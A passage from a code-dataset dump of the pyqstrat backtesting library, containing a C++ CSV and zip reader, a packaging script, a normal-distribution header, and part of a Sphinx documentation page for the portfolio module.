str_to_double(str, '.', ',');\n}\n \ntemplate<> int8_t parse_string<int8_t>(const char* str) {\n return str_to_int8(str);\n}\n\ntemplate<typename T> void add_value(const char* str, void* column) {\n T elem = parse_string<T>(str);\n auto vec = static_cast<vector<T>*>(column);\n vec->push_back(elem);\n}\n\nvoid add_line(const vector<char*>& fields, const vector<string>& dtypes, vector<void*>& data) {\n for (size_t i=0; i < dtypes.size(); ++i) {\n if (dtypes[i] == \"f4\") {\n add_value<float>(fields[i], data[i]);\n } else if (dtypes[i] == \"f8\") {\n add_value<double>(fields[i], data[i]);\n } else if (dtypes[i] == \"i1\") {\n add_value<int8_t>(fields[i], data[i]);\n } else if (dtypes[i] == \"i4\") {\n add_value<int32_t>(fields[i], data[i]);\n } else if (dtypes[i] == \"i8\") {\n add_value<int64_t>(fields[i], data[i]);\n } else if (dtypes[i].substr(0, 3) == \"M8[\") {\n add_value<int64_t>(fields[i], data[i]);\n } else if (dtypes[i][0] == 'S') {\n add_value<string>(fields[i], data[i]);\n } else {\n error(\"invalid type: \" << dtypes[i] << \" expected i1, i4, i8, f4, f8, M8[*] or S[n]\");\n }\n }\n}\n\ntemplate<typename T> vector<T>* create_vec(size_t max_rows) {\n auto vec = new vector<T>();\n vec->reserve(max_rows);\n return vec;\n}\n\nvoid* create_vector(const std::string& dtype, size_t max_rows) {\n if (dtype == \"f4\") {\n return create_vec<float>(max_rows);\n } else if (dtype == \"f8\") {\n return create_vec<double>(max_rows);\n } else if (dtype == \"i1\") {\n return create_vec<int8_t>(max_rows);\n } else if (dtype == \"i4\") {\n return create_vec<int32_t>(max_rows);\n } else if (dtype == \"i8\") {\n return create_vec<int64_t>(max_rows);\n } else if (dtype.substr(0, 3) == \"M8[\") {\n return create_vec<int64_t>(max_rows);\n } else if (dtype[0] == 'S') {\n return create_vec<string>(max_rows);\n } else {\n error(\"invalid type: \" << dtype << \" expected i1, i4, i8, f4, f8, M8[*] or S[n]\");\n }\n}\n\nclass ZipArchive {\npublic:\n static ZipArchive& get_instance() {\n static ZipArchive instance; // Guaranteed to be destroyed.\n return instance;\n }\n ZipArchive(const ZipArchive&) = delete;\n void operator=(const ZipArchive&) = delete;\n \n ~ZipArchive() {\n if (_zip_archives.size()) {\n for (auto zip_archive: _zip_archives) {\n zip_close(zip_archive.second);\n }\n }\n }\n \n zip_t* get_archive(const std::string& zip_filename) {\n zip_t* zip_archive = nullptr;\n {\n std::lock_guard<std::mutex> guard(_zip_archives_mutex);\n auto it = _zip_archives.find(zip_filename);\n if (it == _zip_archives.end()) {\n if (_zip_archives.size() > 100) {\n auto it = _zip_archives.find(_fifo.front());\n zip_close(it->second);\n _zip_archives.erase(it);\n _fifo.pop();\n }\n zip_archive = zip_open(zip_filename.c_str(), ZIP_RDONLY, NULL);\n if (!zip_archive) error(\"can't read: \" << zip_filename << \" : \" << get_error(errno));\n _zip_archives.insert(make_pair(zip_filename, zip_archive));\n _fifo.push(zip_filename);\n } else {\n zip_archive = it->second;\n }\n }\n return zip_archive;\n }\nprivate:\n ZipArchive() {}\n unordered_map<string, zip_t*> _zip_archives;\n queue<string> _fifo;\n mutex _zip_archives_mutex;\n};\n\nstruct Reader {\n virtual ssize_t getline(char** line) = 0;\n virtual string filename() = 0;\n virtual ssize_t fread(char* data, size_t length) = 0;\n virtual ~Reader() {}\n};\n\nstatic const size_t BUF_SIZE = 64 * 1024;\n\nssize_t get_index(char* buf, size_t n, char c) {\n for (size_t i = 0; i < n; ++i) {\n if (buf[i] == c) return i;\n }\n return -1;\n}\n\nssize_t read_line(char** buf, size_t* buf_size, size_t* begin_idx, char** line, Reader* reader) {\n //if buffer is empty read up to buf size into it\n //if cannot read then return -1\n //if buf has data then try to read a line from last position\n //if no line read then we have a partial line\n //copy into\n //read up to buf size\n ssize_t bytes_read = 0;\n size_t line_size = 0;\n ssize_t end_idx = 0;\n if (!*buf) {\n *buf = static_cast<char*>(::malloc(BUF_SIZE));\n //first time only\n bytes_read = reader->fread(*buf, BUF_SIZE);\n if (bytes_read <= 0) return bytes_read;\n *begin_idx = 0;\n *buf_size = bytes_read;\n }\n //buf has data already, try to read a line\n end_idx = get_index(*buf + *begin_idx, *buf_size - *begin_idx, '\\n');\n int begin_inc = 1;\n if (end_idx > 0 && (*buf + *begin_idx)[end_idx - 1] == '\\r') { // windows cr/lf\n end_idx -= 1; // end_idx now points to \\r in \\r\\n\n begin_inc = 2; // next line begins after end_idx + 2 (for \\r\\n)\n }\n\n if (end_idx >= 0) {\n //found a line. update begin index and set line ptr to beginning of this line\n line_size = end_idx;\n (*buf)[*begin_idx + end_idx] = '\\0'; // replace \\r or \\n with \\0 to end line\n *line = *buf + *begin_idx;\n *begin_idx += (end_idx + begin_inc);\n return line_size;\n } else {\n //we read a partial line\n //copy partial line to new buffer\n char* tmp = static_cast<char*>(::malloc(BUF_SIZE));\n size_t partial_str_size = BUF_SIZE - *begin_idx;\n strncpy(tmp, *buf + *begin_idx, partial_str_size);\n ::free(*buf);\n *buf = tmp;\n *begin_idx = 0;\n bytes_read = reader->fread(*buf + partial_str_size, BUF_SIZE - partial_str_size);\n if (bytes_read <= 0) return bytes_read;\n *buf_size = bytes_read + partial_str_size;\n return read_line(buf, buf_size, begin_idx, line, reader);\n }\n}\n \n\nclass ZipReader: public Reader {\npublic:\n ZipReader(const std::string& filename):\n _filename(filename),\n _zip_file(nullptr),\n _buf(nullptr),\n _buf_idx(0),\n _buf_size(0) {\n std::size_t i = filename.find(':');\n auto zip_filename = filename.substr(0, i);\n auto inner_filename = filename.substr(i + 1);\n ZipArchive& archive = ZipArchive::get_instance();\n zip_t* zip_archive = archive.get_archive(zip_filename);\n _zip_file = zip_fopen(zip_archive, inner_filename.c_str(), ZIP_FL_ENC_GUESS);\n if (!_zip_file) error(\"can't read: \" << inner_filename << \" from \" << filename << \" : \" << get_error(errno));\n }\n \n string filename() override { return _filename; }\n \n ssize_t getline(char** line) override {\n return read_line(&_buf, &_buf_size, &_buf_idx, line, this);\n }\n \n ssize_t fread(char* buf, size_t buf_size) override {\n return zip_fread(_zip_file, buf, buf_size);\n }\n \n ~ZipReader() {\n if (_zip_file) zip_fclose(_zip_file);\n _zip_file = nullptr;\n if (_buf) ::free(_buf);\n }\n \nprivate:\n string _filename;\n zip_file_t* _zip_file;\n char* _buf;\n size_t _buf_idx;\n size_t _buf_size;\n};\n\nclass FileReader: public Reader {\npublic:\n FileReader(const std::string& filename):\n _filename(filename),\n _file(::fopen(filename.c_str(), \"r\")),\n _buf(nullptr),\n _buf_idx(0),\n _buf_size(0)\n {}\n \n string filename() override {\n return _filename;\n }\n\n ssize_t getline(char** line) override {\n return read_line(&_buf, &_buf_size, &_buf_idx, line, this);\n }\n \n ssize_t fread(char* buf, size_t buf_size) override {\n if (feof(_file)) return -1;\n if (ferror(_file)) error(\"error reading file\");\n size_t elems_read = ::fread(buf, sizeof(char), ::floor(buf_size / sizeof(char)), _file);\n return elems_read * sizeof(char);\n }\n \n ~FileReader() {\n if (_file) ::fclose(_file);\n _file = nullptr;\n if (_buf) ::free(_buf);\n }\n \nprivate:\n string _filename;\n FILE* _file;\n char* _buf;\n size_t _buf_idx;\n size_t _buf_size;\n};\n\n\n\nbool read_csv_file(Reader* reader,\n const std::vector<int>& col_indices,\n const std::vector<std::string>& dtypes,\n char separator,\n int skip_rows,\n int max_rows,\n vector<void*>& output) {\n \n int row_num = 0;\n output.resize(dtypes.size());\n for (size_t i = 0; i < dtypes.size(); ++i) {\n output[i] = create_vector(dtypes[i], max_rows);\n }\n \n bool more_to_read = true;\n for (;;) {\n char* line = nullptr;\n ssize_t line_size = reader->getline(&line);\n if (line_size <= 0) {\n //eof or error. ::getline returns zero in both cases, zip_fread returns -1 for error, 0 for eof\n more_to_read = false;\n break;\n }\n // cout << \"row num: \" << row_num << \" len: \" << strlen(line) << \" \" << line << endl;\n row_num++;\n \n if (row_num <= skip_rows) continue;\n \n if ((max_rows != 0) && (row_num > max_rows)) break;\n auto fields = tokenize_line(line, separator, col_indices);\n if (!fields.size()) continue; // empty line\n if (fields.size() != dtypes.size()) {\n //replace nulls we added with separator so we can print out the line\n string _line(line, line_size);\n std::replace(_line.begin(), _line.end(), '\\0', separator);\n error(reader->filename() << \" found \" << fields.size() << \" \" << \" fields on row: \" << row_num\n << \" line: \" << _line << \" but dtypes arg length was \" << dtypes.size() << endl)\n }\n add_line(fields, dtypes, output);\n }\n return more_to_read;\n}\n\nvoid test_csv_reader() {\n ifstream istr(\"/Users/sal/tmp/test.csv\", ios_base::in);\n auto dtypes = vector<string>{\n \"M8[ms]\",\n \"S10\",\n \"i4\",\n \"f8\",\n \"i1\"};\n vector<void*> output(dtypes.size());\n bool more_to_read = false;\n auto vec1 = reinterpret_cast<vector<string>*>(output[0]);\n auto vec2 = reinterpret_cast<vector<string>*>(output[1]);\n cout << \"row1: \" << (*vec1)[0] << \" \" << (*vec2)[0] << \"\\n\"\n << \"row2: \" << (*vec1)[1] << \" \" << (*vec2)[1] << \"\\n\"\n << \"more_to_read: \" << more_to_read << endl;\n istr.close();\n}\n\n\n\nbool read_csv(const std::string& filename,\n const std::vector<int>& col_indices,\n const std::vector<std::string>& dtypes,\n char separator,\n int skip_rows,\n int max_rows,\n std::vector<void*>& output) {\n bool more_to_read = false;\n std::size_t i = filename.find(':');\n Reader* reader = NULL;\n if (i == filename.npos) {\n reader = new FileReader(filename);\n bool tmp = read_csv_file(reader, col_indices, dtypes, separator, skip_rows, max_rows, output);\n if (tmp) more_to_read = true;\n delete reader;\n } else {\n reader = new ZipReader(filename);\n bool tmp = read_csv_file(reader, col_indices, dtypes, separator, skip_rows, max_rows, output);\n if (tmp) more_to_read = true;\n delete reader;\n }\n return more_to_read;\n}\n\n\nvoid test_csv_reader2() {\n cout << \"starting\" << endl;\n vector<void*> output(2);\n bool more_to_read = read_csv(\"/Users/sal/tmp/test.csv\",\n {15, 18, 20},\n {\"f4\", \"f4\", \"i4\"},\n ',',\n 1,\n 0,\n output);\n auto vec1 = static_cast<vector<float>*>(output[0]);\n cout << \"num_cols: \" << output.size() << \" num rows: \" << vec1->size() << \" more_to_read: \" << more_to_read\n << \" first entry: \" << (*vec1)[0] << endl;\n}\n\nvoid test_csv_reader_zip() {\n for (int j=0; j < 100000; ++j) {\n cout << \"starting\" << endl;\n vector<void*> output(2);\n bool more_to_read = read_csv(\"/Users/sal/tmp/algo/20220316.zip:20220316/A/AAPL.csv\",\n {2, 9, 18, 27, 35, 48, 49},\n {\"S5\", \"f4\", \"f4\", \"f4\", \"f4\", \"i4\", \"i4\"},\n ',',\n 1,\n 0,\n output);\n auto vec1 = static_cast<vector<float>*>(output[1]);\n cout << \"num_cols: \" << output.size() << \" num rows: \" << vec1->size() << \" more_to_read: \" << more_to_read\n << \" first entry: \" << (*vec1)[0] << endl;\n delete static_cast<vector<string>*>(output[0]);\n for (size_t i=1; i < output.size(); ++i) {\n if (i != 0 && i != 5) {\n delete static_cast<vector<float>*>(output[i]);\n }\n }\n delete static_cast<vector<int32_t>*>(output[5]);\n }\n cout << \"done\" << endl;\n}\n\n" }, { "alpha_fraction": 0.695652186870575, "alphanum_fraction": 0.7101449370384216, "avg_line_length": 16.25, "blob_id": "1f44ec1704c20b243f25367442a0a80b9a8a329f", "content_id": "9bb983ed61b54625d2e056359a89c6c1fb31a7b7", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 69, "license_type": "permissive", "max_line_length": 22, "num_lines": 4, "path": "/dist.sh", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#!/bin/bash\nrm -Rf dist/*\npython3 setup.py sdist\ntwine upload dist/*\n" }, { "alpha_fraction": 0.5573654174804688, "alphanum_fraction": 0.6699716448783875, "avg_line_length": 40.52941131591797, "blob_id": "825ae5de344ac1e2eb81f2c47296d23f67576d34", "content_id": "fe9b16a8b998359e563fd720b9e52c15cb969709", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1413, "license_type": "permissive", "max_line_length": 92, "num_lines": 34, "path": "/pyqstrat/cpp/lets_be_rational/normaldistribution.h", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// Copyright © 2013-2014 Peter Jäckel.\n// \n// Permission to use, copy, modify, and distribute this software is freely granted,\n// provided that this notice is preserved.\n//\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n#ifndef NORMAL_DISTRIBUTION_H\n#define NORMAL_DISTRIBUTION_H\n\n#include <math.h>\n#include <cmath>\n#include \"importexport.h\"\n\n#define ONE_OVER_SQRT_TWO 0.7071067811865475244008443621048490392848359376887\n#define ONE_OVER_SQRT_TWO_PI 0.3989422804014326779399460599343818684758586311649\n#define SQRT_TWO_PI 2.506628274631000502415765284811045253006986740610\n\nEXPORT_EXTERN_C double erf_cody(double z);\nEXPORT_EXTERN_C double erfc_cody(double z);\nEXPORT_EXTERN_C double erfcx_cody(double z);\nEXPORT_EXTERN_C double norm_cdf(double z);\ninline double norm_pdf(double x){ return ONE_OVER_SQRT_TWO_PI*exp(-.5*x*x); }\nEXPORT_EXTERN_C double inverse_norm_cdf(double u);\n\n#endif // NORMAL_DISTRIBUTION_H\n" }, { "alpha_fraction": 0.5985972881317139, "alphanum_fraction": 0.6098716855049133, "avg_line_length": 131.20252990722656, "blob_id": "780cf90f4ebaf358587b44dac1f8696754ec17f0", "content_id": "1179cde6df8a0c4637f7a26c93fa406a975f7245", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 41776, "license_type": "permissive", "max_line_length": 706, "num_lines": 316, "path": "/docs/_modules/pyqstrat/portfolio.html", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "\n<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <title>pyqstrat.portfolio &#8212; pyqstrat 0.1.0 documentation</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/pygments.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/alabaster.css\" />\n <script data-url_root=\"../../\" id=\"documentation_options\" src=\"../../_static/documentation_options.js\"></script>\n <script src=\"../../_static/jquery.js\"></script>\n <script src=\"../../_static/underscore.js\"></script>\n <script src=\"../../_static/_sphinx_javascript_frameworks_compat.js\"></script>\n <script src=\"../../_static/doctools.js\"></script>\n <link rel=\"index\" title=\"Index\" href=\"../../genindex.html\" />\n <link rel=\"search\" title=\"Search\" href=\"../../search.html\" />\n \n <link rel=\"stylesheet\" href=\"../../_static/custom.css\" type=\"text/css\" />\n \n \n <meta name=\"viewport\" content=\"width=device-width, initial-scale=0.9, maximum-scale=0.9\" />\n\n </head><body>\n \n\n <div class=\"document\">\n <div class=\"documentwrapper\">\n <div class=\"bodywrapper\">\n \n\n <div class=\"body\" role=\"main\">\n \n <h1>Source code for pyqstrat.portfolio</h1><div class=\"highlight\"><pre>\n<span></span><span class=\"c1\"># $$_ Lines starting with # $$_* autogenerated by jup_mini. Do not modify these</span>\n<span class=\"c1\"># $$_code</span>\n<span class=\"c1\"># $$_ %%checkall</span>\n<span class=\"kn\">from</span> <span class=\"nn\">__future__</span> <span class=\"kn\">import</span> <span class=\"n\">annotations</span>\n<span class=\"kn\">import</span> <span class=\"nn\">pandas</span> <span class=\"k\">as</span> <span class=\"nn\">pd</span>\n<span class=\"kn\">import</span> <span class=\"nn\">numpy</span> <span class=\"k\">as</span> <span class=\"nn\">np</span>\n<span class=\"kn\">from</span> <span class=\"nn\">functools</span> <span class=\"kn\">import</span> <span class=\"n\">reduce</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.evaluator</span> <span class=\"kn\">import</span> <span class=\"n\">compute_return_metrics</span><span class=\"p\">,</span> <span class=\"n\">display_return_metrics</span><span class=\"p\">,</span> <span class=\"n\">plot_return_metrics</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.strategy</span> <span class=\"kn\">import</span> <span class=\"n\">Strategy</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_utils</span> <span class=\"kn\">import</span> <span class=\"n\">get_child_logger</span>\n<span class=\"kn\">from</span> <span class=\"nn\">typing</span> <span class=\"kn\">import</span> <span class=\"n\">Any</span>\n<span class=\"kn\">from</span> <span class=\"nn\">collections.abc</span> <span class=\"kn\">import</span> <span class=\"n\">Sequence</span>\n\n<span class=\"n\">_logger</span> <span class=\"o\">=</span> <span class=\"n\">get_child_logger</span><span class=\"p\">(</span><span class=\"vm\">__name__</span><span class=\"p\">)</span>\n\n<span class=\"n\">NAT</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;NaT&#39;</span><span class=\"p\">)</span>\n\n\n<div class=\"viewcode-block\" id=\"Portfolio\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">Portfolio</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;A portfolio contains one or more strategies that run concurrently so you can test running strategies that are uncorrelated together.&#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"Portfolio.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;main&#39;</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Args:</span>\n<span class=\"sd\"> name: String used for displaying this portfolio</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">name</span> <span class=\"o\">=</span> <span class=\"n\">name</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Strategy</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.add_strategy\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.add_strategy\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">add_strategy</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">strategy</span><span class=\"p\">:</span> <span class=\"n\">Strategy</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> name: Name of the strategy</span>\n<span class=\"sd\"> strategy: Strategy instance</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">strategy</span>\n <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">name</span> <span class=\"o\">=</span> <span class=\"n\">name</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.run_indicators\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.run_indicators\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">run_indicators</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Compute indicators for the strategies specified</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> strategy_names: By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategy_names</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategy_names</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"s1\">&#39;a portfolio must have at least one strategy&#39;</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span>\n <span class=\"n\">_logger</span><span class=\"o\">.</span><span class=\"n\">info</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;running strategy indicators: </span><span class=\"si\">{</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">run_indicators</span><span class=\"p\">()</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.run_signals\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.run_signals\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">run_signals</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Compute signals for the strategies specified. Must be called after run_indicators</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> strategy_names: By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategy_names</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategy_names</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"s1\">&#39;a portfolio must have at least one strategy&#39;</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span> \n <span class=\"n\">_logger</span><span class=\"o\">.</span><span class=\"n\">info</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;running signals: </span><span class=\"si\">{</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">run_indicators</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">run_signals</span><span class=\"p\">()</span></div>\n \n <span class=\"k\">def</span> <span class=\"nf\">_generate_order_iterations</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">strategies</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">Strategy</span><span class=\"p\">],</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"n\">Strategy</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">]]]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> &gt;&gt;&gt; class Strategy:</span>\n<span class=\"sd\"> ... def __init__(self, num): </span>\n<span class=\"sd\"> ... self.timestamps = [</span>\n<span class=\"sd\"> ... np.array([&#39;2018-01-01&#39;, &#39;2018-01-02&#39;, &#39;2018-01-03&#39;], dtype=&#39;M8[D]&#39;),</span>\n<span class=\"sd\"> ... np.array([&#39;2018-01-02&#39;, &#39;2018-01-03&#39;, &#39;2018-01-04&#39;], dtype=&#39;M8[D]&#39;)][num]</span>\n<span class=\"sd\"> ... self.num = num</span>\n<span class=\"sd\"> ... def _generate_order_iterations(self, start_date, end_date):</span>\n<span class=\"sd\"> ... pass</span>\n<span class=\"sd\"> ... def __repr__(self):</span>\n<span class=\"sd\"> ... return f&#39;{self.num}&#39;</span>\n<span class=\"sd\"> &gt;&gt;&gt; all_timestamps, orders_iter = Portfolio._generate_order_iterations(None, [Strategy(0), Strategy(1)])</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert(all(all_timestamps == np.array([&#39;2018-01-01&#39;, &#39;2018-01-02&#39;, &#39;2018-01-03&#39;,&#39;2018-01-04&#39;], dtype = &#39;M8[D]&#39;)))</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert(all(orders_iter[0][1] == np.array([0, 1, 2, 3])))</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert(all(orders_iter[1][1] == np.array([0, 0, 1, 2])))</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategies</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategies</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">values</span>\n \n <span class=\"n\">timestamps_list</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span> <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">]</span>\n \n <span class=\"n\">all_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">(</span><span class=\"n\">reduce</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">union1d</span><span class=\"p\">,</span> <span class=\"n\">timestamps_list</span><span class=\"p\">))</span>\n \n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnat</span><span class=\"p\">(</span><span class=\"n\">start_date</span><span class=\"p\">):</span>\n <span class=\"n\">all_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">all_timestamps</span><span class=\"p\">[(</span><span class=\"n\">all_timestamps</span> <span class=\"o\">&gt;=</span> <span class=\"n\">start_date</span><span class=\"p\">)]</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnat</span><span class=\"p\">(</span><span class=\"n\">end_date</span><span class=\"p\">):</span>\n <span 